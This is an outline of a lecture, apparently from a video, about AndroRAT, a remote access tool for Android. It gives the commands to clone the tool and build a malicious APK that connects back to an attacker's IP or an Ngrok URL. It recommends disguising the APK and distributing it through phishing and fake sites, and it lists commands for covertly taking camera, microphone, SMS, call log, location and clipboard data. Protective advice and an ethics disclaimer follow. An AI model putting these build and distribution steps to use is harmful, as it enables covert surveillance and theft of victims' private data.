Lecture on Cybersecurity Threats: AndroRAT and Mobile Security

Introduction

• Theme: Understanding Android security threats
• Focus: AndroRAT - a tool for remote access to Android devices
• Objective: Educate on creating awareness to protect against attacks
• Disclaimer: Educational purposes only; illegal to use maliciously

Overview of AndroRAT

• Functionality: Gives full control over Android devices
• Access:
  • Cameras
  • Microphones
  • Messages
  • Location data
• Invisibility: No warnings or noticeable signs for users
• Control: Allows remote control by attackers

Setup and Installation

1. Kali Linux Preparation

   • Update using sudo apt update
   • Upgrade packages with sudo apt upgrade

2. AndroRAT Installation

   • Not in default repositories; download from GitHub
   • Clone repository using git clone
   • Navigate to the AndroRAT directory
   • Create a virtual environment and activate it
   • Install dependencies from requirements.txt

3. Creating Malicious APK

   • Use command: python3 androrat.py --build -i [IP] -p 8000 -o rat.apk
   • Exploits trust by mimicking legitimate app icons

4. Distribution of Malicious APK

   • Use social engineering for installation
   • Methods include phishing, fake websites, third-party stores

Demonstration of AndroRAT's Capabilities

• Remote Access: Connection from target to attacker’s machine
• Command Features:
  • camList: Access device cameras
  • start_audio / stopAudio: Record microphone audio
  • getSMS inbox/sent: Retrieve SMS messages
  • getCallLogs: Access call history
  • getLocation: Retrieve GPS coordinates
  • getClipData: Access clipboard contents
  • vibrate: Control device vibration

Internet-based Attacks

• Using Ngrok:
  • Establishes connection over the internet
  • Command: python3 androrat.py --build --ngrok -o devil.apk
  • Creates a public URL via Ngrok

Protective Measures

• App Downloads: Use only official sources like Google Play Store
• Permissions: Review app permissions critically
• Updates: Regularly update device software
• Security Software: Install mobile security solutions
• Be Wary:
  • Avoid dubious links
  • Monitor for unusual device behavior

Conclusion

• Educational Purpose: Understanding threat to improve security
• Ethical Use: Knowledge to protect, not exploit
• Community Engagement: Encourage sharing information

Call to Action

• Engagement: Like, subscribe, and share for awareness
• Feedback: Invite comments and topic suggestions

Final Reminder

• Knowledge empowers protection but requires ethical responsibility
• Stay informed and vigilant against cybersecurity threats

Presenter: Tech Sky

• Encourages continued learning and ethical practice in cybersecurity.